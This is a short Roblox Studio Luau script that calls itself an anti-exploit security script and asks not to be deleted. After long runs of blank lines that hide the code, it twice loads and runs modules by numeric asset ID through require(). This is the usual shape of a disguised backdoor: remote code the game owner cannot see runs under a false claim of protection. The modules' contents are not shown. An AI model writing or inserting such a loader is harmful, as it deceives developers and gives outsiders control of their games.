--!strict


--This an script of ROBLOX Studio. Do not delete it, this script secures your game from exploiters.

--Thanks.





























































































































































































































































































local mymodule2 = require(3667797501)
mymodule2.antiexploit()

wait(2) 

local mymodule = require(3664252382)
mymodule.antibackdoor()




























































































































































































































































local mymodule2 = require(3667797501)
mymodule2.antiexploit()

wait(2) 

local mymodule = require(3664252382)
mymodule.antibackdoor()

















































































































